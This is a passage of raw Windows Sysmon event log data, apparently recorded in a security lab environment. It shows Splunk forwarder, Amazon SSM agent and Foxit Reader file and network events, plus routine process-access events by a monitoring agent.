12:20:42.726{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56281-false10.0.1.12-8000- 23542300x800000000000000041439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:44.632{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-041MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:44.139{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A446B03C8E79ADD7172076078E167E57,SHA256=11B54B7F2C4CC9D58F9B7E8DB7517D7C9BD61922595FB303E6F883E4314CAE59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016185Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:45.777{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=914E45C597A9DCE4856208C674CCD3C4,SHA256=25D96B48851501F3D0B13A68E995FDFB6C8202F55725CD11C6813F62AB227C15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:45.631{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-042MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:45.209{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E9AA4C9A9921CA843327E6C9EC9CF12,SHA256=08DF67CA414795DF768E93E6774FAE9C9F46F0A84F30089B0BD3F2F626DF80F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016186Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:46.865{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=117BA4BA9DBB27A3AF0724EFF242F84C,SHA256=1BBD3620E4FEEBFFC4575759D655F488BFF8AFAA625DFC42D97E3811517724A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:46.283{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=982B395359EC4B5CB8E781188631F714,SHA256=C8B32E0BF742B9F09CAEF6D00C7D9139CA5BB9B448AE99105CB1C60A4CC0149C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016187Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:47.964{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D4755A798A0AEB67052286DA072700A,SHA256=698F3E9167965A79BE361722540F76CDF18A666086B1BBAF257A78718D748AFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:47.376{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8236322AACA94287CE0F0D0DA61DC833,SHA256=D11F8C8792D790A47767AECB04CC4A877D410EB36838335DEA4B1609D9F99950,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:48.463{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA5F90F17AA0A5E72ACB450BEEA775BA,SHA256=CA8E6A19187E729C6A491C9A32B18DEB729F9561A4F16C116D26B333F25FBAED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016188Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:45.938{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50081-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000041446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:49.560{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E75E753425939267A83212DC8D2984DA,SHA256=90239650A63300BB31B833EA5FBD02FA490C86CDA9F0864BB0086846F8D051F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016189Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:49.044{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02F0D9914FEC50CC1E397105817A3791,SHA256=8C4AC520D27F085C35B423D6A5D28817633011066BACD37B31ACB4D52CF955D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:50.631{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61F255D961C1701FA40D230A1E30C9B8,SHA256=145D75EA41B3D0E27307779B39F83912DC181E0D06CA1013B8A0C8801C6AE369,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016190Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:50.126{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E54C2168275BF21F0ABE8C9D0BA6199F,SHA256=07473002DE61B5D870F3F861652E02E5C2B5FB442E6DD450B91F20F4E3F2BA15,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:47.736{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56282-false10.0.1.12-8000- 23542300x800000000000000041476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.916{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=052C52557E7C8CF454B77B9DDB333560,SHA256=90341E880CC2B85B679ABA6F2A59933ABDAEBA9B10DBDDC59FCF4C8EEACE83A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.915{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_MqJERtCusfcRIuQMD5=4C5C34C4BFD7C50C3A446C7C32429634,SHA256=DC785D209C57D40A28477649F17EA3BDF19D26AB8E7C25D76713BA3CA93CF693,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.914{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.912{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.905{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000041470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.905{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=B2114D3116FB8F81CF5BD193E385F3E5,SHA256=EC091B2FB2F3054819894A630509C1D39510014757C881354BBD48E4CB0CA236,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.901{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.890{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.884{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.879{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.876{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.874{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.872{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.848{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.843{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.807{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.783{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 